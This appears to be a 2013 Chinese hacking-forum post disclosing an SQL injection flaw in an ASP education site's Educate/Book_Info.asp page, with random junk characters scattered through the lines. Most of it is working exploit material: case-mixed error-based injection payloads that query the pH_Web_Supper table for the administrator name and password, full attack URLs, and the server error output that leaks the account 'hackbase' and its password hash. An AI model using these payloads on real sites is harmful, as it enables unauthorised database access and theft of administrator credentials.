漏洞出现在Educate/Book_Info.asp
* L9 n' [: h8 j3 ~% n( M. s + i0 x* {- Y! @. {4 U& E5 T
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出% L. A% p- _/ {+ s
& N* L5 j/ |& V, t/ r4 R4 f3 Pexp:如下- A) G5 H) l3 v7 V' T
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
3 A$ b/ @2 T+ t! r/ N, u查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)" m: ^' |: x( _- J8 Y! p4 W
5 l. J& c7 L0 n3 _* C3 l$ P7 }http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
1 K( q1 d7 V( C
[5 _4 _- A4 U4 P) B' ~6 ~8 xMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
( K9 G) l7 o$ M; {6 d H$ W
3 j9 _3 [+ w; y将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。( E/ j8 ]6 Y8 V1 k
/ Z/ _( A" T0 p* B8 ]% w/Educate/Book_Info.asp,行 89 u4 A1 ^$ A$ ^% X4 g
8 m/ M6 h' a* n! d: z ahttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper) M( ^( B. M f6 ^5 F; ]
. w. x! B+ u7 ?2 y' [Microsoft OLE DB Provider for SQL Server 错误 '80040e07'# b+ g, P& [0 j5 x. V q& l& f
+ B5 A2 m3 O+ L* ?8 Z3 H" t将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
6 N8 V' r* d! M% p% a- V" Z; q
4 P) i' X; \' h6 @7 `* f/Educate/Book_Info.asp,行 8
& ]8 o7 a! I. v; o$ M$ b* h2 `" @ |
发表于 2013-2-16 21:44:16
收藏
支持
反对